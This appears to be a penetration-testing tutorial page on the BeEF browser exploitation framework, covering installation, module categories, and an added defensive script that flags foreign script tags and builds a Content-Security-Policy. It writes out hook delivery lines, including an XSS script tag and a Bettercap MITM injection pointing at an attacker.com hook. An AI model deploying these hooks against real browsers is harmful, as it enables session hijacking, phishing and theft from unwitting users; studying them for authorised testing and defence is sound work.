What is BeEF?
BeEF (Browser Exploitation Framework) is a penetration testing tool that focuses entirely on web browser vulnerabilities. Rather than attacking the network or OS layer, BeEF hooks victim browsers via a small JavaScript payload — typically injected through an XSS vulnerability or a malicious page — and turns them into remotely controlled clients. Once hooked, an operator can run hundreds of modules against the victim's browser: fingerprinting, credential harvesting, webcam access, social engineering overlays, network pivoting, and integration with Metasploit for full exploitation chains.
Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
```bash
# Update packages
sudo apt update

# Install BeEF (pre-installed on Kali as beef-xss)
sudo apt install beef-xss -y

# OR install manually from source
git clone https://github.com/beefproject/beef.git
cd beef
sudo ./install

# Start BeEF
sudo beef-xss

# Default web UI: http://127.0.0.1:3000/ui/panel
# Default creds: beef / beef (change in config.yaml immediately)
```
How It Works
```
# The hook script is served by BeEF's built-in web server:
#   http://[attacker-ip]:3000/hook.js

# Deliver the hook to a victim browser via:
# 1. Reflected/stored XSS on a target site:
#      <script src="http://attacker.com:3000/hook.js"></script>
# 2. A cloned phishing page (use with Social Engineering Toolkit)
# 3. A MITM injection via Bettercap's http.proxy module:
#      set http.proxy.injectjs http://attacker.com:3000/hook.js
#      http.proxy on

# Once hooked, the victim's browser appears in the BeEF web UI
# under "Hooked Browsers" — select it to run modules.
```
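Seen from the defending site, the hook described above is an external `<script src>` pointing at an origin the page never meant to load. The following added example (not from the original page or the BeEF project; the host names, function names and allowlist are hypothetical) audits a page's HTML for such tags and derives the matching Content-Security-Policy `script-src` value that makes the browser refuse them.

```javascript
// Added example: audit HTML for <script src> tags whose origin is not allowlisted.
// Regex tag matching is a simplification; use a real HTML parser in production.
const SCRIPT_SRC_RE = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function findUnexpectedScripts(html, pageUrl, allowedOrigins) {
  const allowed = new Set([new URL(pageUrl).origin, ...allowedOrigins]);
  const findings = [];
  for (const m of html.matchAll(SCRIPT_SRC_RE)) {
    const raw = m[1] ?? m[2] ?? m[3];
    let url;
    try {
      url = new URL(raw, pageUrl); // resolves relative and protocol-relative src
    } catch {
      findings.push({ src: raw, origin: null, reason: "unparseable src" });
      continue;
    }
    if (allowed.has(url.origin)) continue;
    // Heuristic from the defaults named on this page: /hook.js served on port 3000.
    const beefDefault = url.pathname.endsWith("/hook.js") || url.port === "3000";
    findings.push({
      src: raw,
      origin: url.origin,
      reason: beefDefault ? "matches BeEF default hook path or port" : "origin not allowlisted",
    });
  }
  return findings;
}

// The same allowlist expressed as a CSP directive enforced by the browser.
function buildCsp(allowedOrigins) {
  return ["script-src 'self'", ...allowedOrigins].join(" ");
}

// Constructed sample page; all hosts are placeholders.
const SAMPLE_HTML = `
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head><body>
<p>Comment: nice post<script src="http://attacker.example:3000/hook.js"></script></p>
<script src='//tracker.example.net/t.js'></script>
</body></html>`;

const findings = findUnexpectedScripts(
  SAMPLE_HTML, "https://shop.example.com/post/1", ["https://cdn.example.com"]);
console.log(findings);
console.log("Content-Security-Policy:", buildCsp(["https://cdn.example.com"]));
```

The CSP covers the XSS delivery path; the Bettercap injection path only works against unencrypted HTTP, so serving the site exclusively over HTTPS is the corresponding control there.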
Key Module Categories
- Network — Port scan the victim's internal network via their browser
- Browser — Fingerprint browser version, plugins, extensions, and cookies
- Social Engineering — Fake update dialogs, credential phishing overlays, fake Flash prompts
- Host — Detect OS, installed software, and clipboard contents
- Metasploit — Launch browser exploit modules directly from Metasploit via BeEF's bridge
- Persistence — Keep the hook alive across page navigations using iframes or workers
- Webcam / Mic — Request access to camera and microphone (requires user permission prompt)
- Tunneling — Use the hooked browser as a proxy to reach internal network resources
Common Use Cases
- Demonstrating the real-world impact of XSS vulnerabilities during authorized assessments
- Client-side attack chains combined with Metasploit for full compromise
- CTF (Capture The Flag) challenges involving browser exploitation
- Internal red team social engineering simulations
Tips & Best Practices
Change the default credentials in /etc/beef-xss/config.yaml before starting BeEF — the defaults are publicly known. For persistent hooks across navigation, use the persistence module to respawn the hook via a hidden iframe. Combine BeEF with Bettercap's http.proxy injection module to hook every unencrypted HTTP session on a LAN without needing an XSS vulnerability at all.
Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.